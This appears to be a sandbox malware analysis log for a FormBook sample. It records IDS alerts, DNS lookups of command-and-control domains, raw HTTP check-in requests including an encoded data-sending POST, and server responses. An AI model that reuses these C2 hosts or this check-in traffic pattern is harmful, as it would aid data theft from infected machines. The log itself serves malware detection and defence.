                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50019 -> 162.218.30.235:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50000 -> 209.74.79.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50023 -> 109.206.161.15:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50022 -> 162.218.30.235:80
                Source: DNS query: www.apptj7.xyz
                Source: DNS query: www.l40175.xyz
                Source: DNS query: www.l40175.xyz
                Source: DNS query: www.asianoilporn.xyz
                Source: Joe Sandbox ViewIP Address: 194.245.148.189 194.245.148.189
                Source: Joe Sandbox ViewIP Address: 18.143.155.63 18.143.155.63
                Source: Joe Sandbox ViewASN Name: VODANETInternationalIP-BackboneofVodafoneDE VODANETInternationalIP-BackboneofVodafoneDE
                Source: Joe Sandbox ViewASN Name: CSLDE CSLDE
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
                Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.143.155.63:80 -> 192.168.2.5:49936
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F822EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00F822EE
                Source: global trafficHTTP traffic detected: GET /bztr/?glL=+raX0WyLDYw8S+KRmoOtaFiRfySuxy85gg+Qzu5w0Ad1L/hVTfA6SqKbdvi+w2gMBWyH6yJFSUmTR0ZUJNCZeb91TbfwhQ6kNHH3J+lp18PT0J6Lm7L9P5Q9gRLrhFE3Rg==&UBE=olMPpNEHS HTTP/1.1Host: www.did-ready.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /2qp1/?glL=iAfo7kyxyM8SbyTkDI5k288SnJKrpySaUlzu2KdJLHgSYyW5/i+VJubeiwpJlBWypThli/YBYynL/4IW8lZMR/MoGyinCvu20CTNw0ikAJ9FU+0P9V3uIW81193Xb1ws6Q==&UBE=olMPpNEHS HTTP/1.1Host: www.cloijz.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /jfb9/?UBE=olMPpNEHS&glL=n+oufRGikYAAs0HL5l5OS9+VIte6FD/PUe1ObhKPGO46Uzt6PHcP6K7liCFsUkPKwyN7qiCJdHMCS8kfAvInPaDq96CZaATaILcBmE0TRRNwo+1Tq8y6+R2DGpr7DsE+qQ== HTTP/1.1Host: www.gayhxi.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /iiuy/?glL=h5hfYSwK15xKquamFutJkZvqM9csqGuuwC4tQTE20yZspqFHLNM/fO5mCZyIAMXPSsknukIC0GoengQLRlCOYavrEGfuz6Bpd5KKMLFzOmqT4l3909FqMEv20jVy1tDFzg==&UBE=olMPpNEHS HTTP/1.1Host: www.promocao.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /bpfk/?glL=sPHwYLohOQUi7tbny8xAX65Ak8k0vxLoER6T/oVqsoypwBs53zqD5Fqu0PMIJSMinBeTsBqmPa+l3heiZ3MyHfx16PXUeUVxWIEE2iZ6N1rL+1ViRRDgwfUXWv4GRPFujA==&UBE=olMPpNEHS HTTP/1.1Host: www.xinchaocjcela.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /98fz/?glL=RJha4vFTfn028r748QaKWzY3zBjda9lgy5GIiv729qv2JwyeJ9FchPfcwK1GDn6Hb6aTQtRNlFd0HD7GNtrjwDfmHF/7uT8zd6XTiRBlVFtH5kS3JAR6f4NO6tJ4vxk+Qw==&UBE=olMPpNEHS HTTP/1.1Host: www.telepzow.fitAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ggyo/?UBE=olMPpNEHS&glL=m5nQSpVE4vTeJQvmR3TAY/TJTXdjgajw1Lyal6oe9urBMIFc1v6qfwsfjXEygtTM8R0qLGp2dDcvep+fimbrPnZRDkqBeALd13Q2E3lco64KYzTU14qy7bIl8drmzIYefw== HTTP/1.1Host: www.rpa.asiaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /4der/?glL=YYMGHc7nB9HtOtUeBPVSxR+WmRqt9hwVJNfACr/+gthqhU+TX8+lmYNNDhSQdPk9Ul0tcTJBmGlE6igitsY0L34TIiyEVDNgetJ+DsRbDx0/KucqiDM9wQsuWEr/lXATQw==&UBE=olMPpNEHS HTTP/1.1Host: www.daildeals.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /h075/?glL=M5bvpBBqdFhJI3dj4cnOi+0hxtX9G085UsP+X3mPywmFdAggjKtsm03AwUgw4dQv/vdP/KMVkiz+p77N0f0uhKMHc0BcakRvdnUpLgU+aD+qtEn9gsH1uJ0rHPAgqsfAdw==&UBE=olMPpNEHS HTTP/1.1Host: www.mirenzhibo.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /t927/?glL=1AUeCouptuEGP7RovDtARH/U/lHTmYtQpaOev7ZhwUeAiwA2sBfsbG9bB2esWamzUJ66A9MuqPgLEbs+7T22kSOzTS65ksENviFiIZVoUief+HuQlYMIDZa7g/mDFFXpJw==&UBE=olMPpNEHS HTTP/1.1Host: www.panavet.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ul4e/?glL=cvxki0kBFrS2hvGq027olA1jgamEceFj1uttxlM7dB07FxcfiLStaTGfrtmHmLc0lZI/hpa9nyxgRPTa9U6Df5W0ae2c8VAHa4Pcz3SNtLaImxYBNDaekCndloRVf++j2Q==&UBE=olMPpNEHS HTTP/1.1Host: www.sorket.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /mrxb/?UBE=olMPpNEHS&glL=NgJ+OnnL+9OBdVp7mPrYcj/CL8QLoMcpZkBIol5kocXo4N6jyyJX5z7K1FeGxVZdJwTVkN8+aLH/2HPW1qgyNV99doo6LX/75R8r7QWsELDS7SzymadyYj0FRqZ+x5EaLw== HTTP/1.1Host: www.wuyyv4tq.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /9wie/?glL=fUVF0yGwbjZS9JQH12rZ580bfGpiumkyA0dLZ5nzo5P8yhbpEdmY75SbGAh7VrLR/io7d1Ft+bkykmkNpko73APUSyaK4huICcj6uecTmafkZBba7diBV9QQlm/AYdU87w==&UBE=olMPpNEHS HTTP/1.1Host: www.l40175.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.did-ready.info
                Source: global trafficDNS traffic detected: DNS query: www.cloijz.info
                Source: global trafficDNS traffic detected: DNS query: www.gayhxi.info
                Source: global trafficDNS traffic detected: DNS query: www.promocao.info
                Source: global trafficDNS traffic detected: DNS query: www.xinchaocjcela.net
                Source: global trafficDNS traffic detected: DNS query: www.telepzow.fit
                Source: global trafficDNS traffic detected: DNS query: www.rpa.asia
                Source: global trafficDNS traffic detected: DNS query: www.daildeals.store
                Source: global trafficDNS traffic detected: DNS query: www.apptj7.xyz
                Source: global trafficDNS traffic detected: DNS query: www.mirenzhibo.net
                Source: global trafficDNS traffic detected: DNS query: www.panavet.net
                Source: global trafficDNS traffic detected: DNS query: www.sorket.tech
                Source: global trafficDNS traffic detected: DNS query: www.wuyyv4tq.top
                Source: global trafficDNS traffic detected: DNS query: www.l40175.xyz
                Source: global trafficDNS traffic detected: DNS query: www.asianoilporn.xyz
                Source: unknownHTTP traffic detected: POST /2qp1/ HTTP/1.1Host: www.cloijz.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-USOrigin: http://www.cloijz.infoContent-Length: 204Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: max-age=0Referer: http://www.cloijz.info/2qp1/User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36Data Raw: 67 6c 4c 3d 76 43 33 49 34 55 65 31 2f 37 56 6a 65 44 66 71 51 62 4a 2f 32 50 51 58 6b 72 4f 59 79 31 6e 75 57 77 48 6b 2f 65 5a 71 63 30 4e 74 51 69 65 47 36 41 32 46 4e 75 2f 6e 33 41 38 32 75 77 43 4e 70 78 45 37 31 50 6f 75 59 44 6e 2f 30 4a 41 64 71 6e 4a 78 64 59 31 67 47 53 75 5a 43 74 6d 34 37 30 2b 35 6d 77 58 7a 52 64 4a 4a 45 74 6f 31 74 33 2f 63 65 56 67 71 6f 76 69 71 64 7a 39 43 67 4d 6f 56 4c 53 30 4e 44 70 74 38 67 74 65 4b 57 4d 54 66 55 35 38 59 4b 54 78 63 61 37 31 66 31 61 63 6c 77 68 37 77 48 76 74 56 51 77 42 61 49 6a 6f 69 65 46 36 46 65 35 38 42 69 6b 58 52 76 5a 4b 6f 2f 2b 49 3d Data Ascii: glL=vC3I4Ue1/7VjeDfqQbJ/2PQXkrOYy1nuWwHk/eZqc0NtQieG6A2FNu/n3A82uwCNpxE71PouYDn/0JAdqnJxdY1gGSuZCtm470+5mwXzRdJJEto1t3/ceVgqoviqdz9CgMoVLS0NDpt8gteKWMTfU58YKTxca71f1aclwh7wHvtVQwBaIjoieF6Fe58BikXRvZKo/+I=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Dec 2024 21:03:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VdCRCE9q0%2BZzewy9FA1ukCw2ZCSIDRJ4wNc85Bdv3zD7WkI0%2BGmnmGedplvA2eFeCEleFhKNFpqRH1AAcp2hx3Fj%2Fbyqeund%2BS8S2XzNGvBNnJHZkWwplEEWXKDIIM8NpakJ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f319f818ec36a5f-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1620&min_rtt=1620&rtt_var=810&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=823&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 41 0a c2 30 10 45 f7 85 de 61 3c 40 8c 2d 05 37 43 36 a2 e0 42 37 9e 20 75 c6 26 90 26 65 8c 60 6f 2f 55 0b e2 da a5 ab 81 ff df 7f 0c ba dc 07 53 16 e8 d8 92 c1 ec 73 60 d3 ac 1a 38 a6 0c bb 74 8b 84 fa 15 a2 7e 22 65 81 6d a2 71 ba 67 8e 99 c5 a0 ab be 17 ae 32 a8 df f5 e4 16 33 c3 b1 f3 f1 ae ab 65 bd 5e d6 9f 88 9e a5 7a 7e 68 a1 14 58 18 2c 91 8f 1d e4 04 e4 af b6 0d 0c 87 d3 7e 0b 36 12 6c 9c a4 9e e1 22 9e 23 85 11 58 24 09 0c b6 63 50 ea af f8 b5 e2 01 82 0d 95 02 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: afA0Ea<@-7C6B7 u&&e`o/USs`8t~"emqg23e^z~hX,~6l"#X$cP+0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Dec 2024 21:04:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M%2FotBM2D8i1rV%2Bwoc9k4t%2BICv79U7RJ4njTQqxI7s25twjWJf0o2ndG%2BPdlA%2BbyfUyQ3k0UMOD9BT3dbhKaEFFRCOJsH6yFQBov0klluD%2FUuo1qXvmKz8GzI60gGzHIlh0W5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f319f921ca4c35e-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1573&rtt_var=786&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=843&delivery_rate=0&cwnd=57&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 41 0a c2 30 10 45 f7 85 de 61 3c 40 8c 2d 05 37 43 36 a2 e0 42 37 9e 20 75 c6 26 90 26 65 8c 60 6f 2f 55 0b e2 da a5 ab 81 ff df 7f 0c ba dc 07 53 16 e8 d8 92 c1 ec 73 60 d3 ac 1a 38 a6 0c bb 74 8b 84 fa 15 a2 7e 22 65 81 6d a2 71 ba 67 8e 99 c5 a0 ab be 17 ae 32 a8 df f5 e4 16 33 c3 b1 f3 f1 ae ab 65 bd 5e d6 9f 88 9e a5 7a 7e 68 a1 14 58 18 2c 91 8f 1d e4 04 e4 af b6 0d 0c 87 d3 7e 0b 36 12 6c 9c a4 9e e1 22 9e 23 85 11 58 24 09 0c b6 63 50 ea af f8 b5 e2 01 82 0d 95 02 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: afA0Ea<@-7C6B7 u&&e`o/USs`8t~"emqg23e^z~hX,~6l"#X$cP+0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Dec 2024 21:04:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZutYpEb21Dv7mnYTybT68aiq64RJl1%2B4N6mJt8LQDyDwPWL8b9Vqp9CsUOHgPcLkpgsVUhMsdZiKzBuMlKBV%2FRviQqxKJyLsLNLzQmT%2FN%2Bh516c4mYsAK5l8PRr2aNd6Jhrr"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f319fa2ac098c54-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2024&min_rtt=2024&rtt_var=1012&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1860&delivery_rate=0&cwnd=182&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 41 0a c2 30 10 45 f7 85 de 61 3c 40 8c 2d 05 37 43 36 a2 e0 42 37 9e 20 75 c6 26 90 26 65 8c 60 6f 2f 55 0b e2 da a5 ab 81 ff df 7f 0c ba dc 07 53 16 e8 d8 92 c1 ec 73 60 d3 ac 1a 38 a6 0c bb 74 8b 84 fa 15 a2 7e 22 65 81 6d a2 71 ba 67 8e 99 c5 a0 ab be 17 ae 32 a8 df f5 e4 16 33 c3 b1 f3 f1 ae ab 65 bd 5e d6 9f 88 9e a5 7a 7e 68 a1 14 58 18 2c 91 8f 1d e4 04 e4 af b6 0d 0c 87 d3 7e 0b 36 12 6c 9c a4 9e e1 22 9e 23 85 11 58 24 09 0c b6 63 50 ea af f8 b5 e2 01 82 0d 95 02 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: afA0Ea<@-7C6B7 u&&e`o/USs`8t~"emqg23e^z~hX,~6l"#X$cP+0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Dec 2024 21:04:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qARLLN1BV2FS87tXJdPp9WtRIiuvDSmiytz%2FV2PevtPhiEFFmf2QQeN%2BVqZwbgy3n6gLuRBbmvK3hfd8R8ORpN2Z4lXAsZzebe2Fu%2F8XQk6XwF0VlxkZJGDOCdnUufSLobj5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f319fb35b4b420a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1598&rtt_var=799&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=564&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 62 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 37 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 Data Ascii: 22b<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.27.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome fr
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 16 Dec 2024 21:04:14 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 